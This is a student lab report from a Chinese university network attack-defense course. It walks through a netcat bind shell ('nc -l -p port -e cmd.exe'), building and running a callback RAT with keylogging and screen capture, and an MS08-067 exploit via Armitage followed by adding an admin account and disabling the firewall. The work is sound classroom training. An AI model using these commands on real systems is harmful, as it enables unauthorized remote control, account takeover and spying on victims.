實驗報告4
網路對抗技術
實驗報告
實驗四 |
惡意程式碼技術 |
學生姓名 |
劉立坤 |
年級 |
2015 |
區隊 |
二區隊 |
指導教師 |
高見 |
資訊科技與網路安全學院
2017年10月24日
實驗任務總綱
2017—2018 學年
一、實驗目的
1.通過對木馬的練習,使讀者理解和掌握木馬傳播和執行的機制;通過手動刪除木馬,掌握檢查木馬和刪除木馬的技巧,學會防禦木馬的相關知識,加深對木馬的安全防範意識。
2.瞭解並熟悉常用的網路攻擊工具,木馬的基本功能;
3.達到鞏固課程知識和實際應用的目的。
二、實驗要求
1.認真閱讀每個實驗內容,需要截圖的題目,需清晰截圖並對截圖進行標註和說明。
2.文件要求結構清晰,圖文表達準確,標註規範。推理內容客觀、合理、邏輯性強。
3.軟體工具可使用NC、MSF等。
4.實驗結束後,保留電子文件。
三、實驗步驟
1.準備
提前做好實驗準備,實驗前應把詳細瞭解實驗目的、實驗要求和實驗內容,熟悉並準備好實驗用的軟體工具,按照實驗內容和要求提前做好實驗內容的準備。
2.實驗環境
描述實驗所使用的硬體和軟體環境(包括各種軟體工具);
開機並啟動軟體office2003或2007、瀏覽器、加解密軟體。
3.實驗過程
1)啟動系統和啟動工具軟體環境。
2)用軟體工具實現實驗內容。
4.實驗報告
按照統一要求的實驗報告格式書寫實驗報告。把按照模板格式編寫的文件嵌入到實驗報告文件中,文件按照規定的書寫格式書寫,表格要有表說圖形要有圖說。
任務一 利用NC控制電腦
NetCat,具有網路軍刀之稱,它小巧精悍且功能強大,說它小巧精悍,是因為他的軟體大小現在已經壓縮到只有十幾KB,而且在功能上絲毫不減。
實驗過程需要兩個同學相互配合完成:
步驟一:
在受害者的機器 (同學A)
輸入下面的命令:
nc.exe -l -p port -e cmd.exe 進入監聽模式
步驟二:
在攻擊者的機器.(同學B)
輸入下面的命令:
nc ip port //連線victim_IP,然後得到一個shell。 (需要截圖)
步驟三:
在shell中,利用net user 使用者名稱 密碼 /add ,新增一個使用者,並在受害者的機器中使用 net user 命令進行驗證。(需要截圖)
可以繼續通過命令列做一些事情。
任務二 利用木馬控制電腦
實驗過程需要兩個同學配合:
步驟一:
攻擊者的機器. (同學A)
開啟V2014.exe程式或則star RAT,這兩個木馬功能類似。
步驟二:
點選選單欄中的“服務生成”,在彈出的配置服務端中,配置回連IP地址(攻擊者IP)和埠號,並點選“生成”按鈕,生成木馬服務端。
步驟三:
將生成的木馬可執行程式拷貝到受害者的機器,並雙擊執行。
步驟四:
在控制端中檢視木馬上線情況,並對以下功能每個進行測試和截圖。
- 檔案管理,嘗試拷貝檔案
成功拷貝。
- 螢幕控制,嘗試獲取桌面
- 鍵盤記錄,嘗試獲取對方擊鍵記錄
- 會話管理,重啟對方機器,檢視是否能自啟動上線
會話管理,解除安裝對方的木馬。
任務三 通過漏洞獲取shell(合天平臺中做) 所有過程截圖寫部落格
windows ms08067 漏洞利用
在平臺中獲取shell之後,繼續利用攻擊機器使用
net user user pass /add
net localgroup administrators /add
命令向被攻擊的機器中新增賬戶,並提升為管理員
然後用rdesktop 10.1.1.130 登陸對方的遠端桌面
Ipcinfig檢視網路配置
關閉防火牆
攻擊者網路配置資訊
啟動armitage
初始介面
對系統進行掃描
完成掃描
檢視服務
掃描
掃描漏洞
ATTACK
選擇漏洞
配置攻擊資訊,檢視許可權
命令向被攻擊的機器中新增賬戶,並提升為管理員
然後用rdesktop 10.1.1.130 登陸對方的遠端桌面